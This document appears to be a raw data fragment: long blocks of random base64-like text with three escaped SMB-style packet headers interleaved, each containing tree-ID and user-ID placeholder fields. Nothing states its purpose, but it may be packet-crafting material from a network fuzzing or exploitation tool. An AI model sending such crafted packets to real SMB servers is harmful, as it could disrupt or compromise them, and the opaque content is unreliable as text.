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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xb3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\xfe__USERID__PLACEHOLDER__@\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xd3\\\\x00\\\\x00\\\\x00\\\\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